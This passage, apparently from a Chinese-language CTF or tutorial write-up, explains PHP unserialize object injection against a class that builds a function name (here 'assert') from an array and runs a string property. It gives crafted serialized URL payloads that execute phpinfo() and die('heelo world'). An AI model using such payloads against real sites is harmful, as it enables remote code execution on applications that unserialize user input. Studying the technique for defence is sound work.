fn);       return $r($this->str);    }}if($_GET['url']) unserialize($_GET['url']) && die();show_source(__FILE__);?>

所以 只要我们提交一个

$o=new test; $o->str='phpinfo()'; 那么是不是就会起到执行phpinfo呢？ 所以转换一下  xx.php?url=O:4:"test":1:{s:3:"str";s:9:"phpinfo()";} 就会执行了  这个类~~~~

如

?url=O:4:%22test%22:2:{s:2:%22fn%22;a:6:{i:0;s:1:%22a%22;i:1;s:1:%22s%22;i:2;s:1:%22s%22;i:3;s:1:%22e%22;i:4;s:1:%22r%22;i:5;s:1:%22t%22;}s:3:%22str%22;s:18:%22die('heelo%20world')%22;}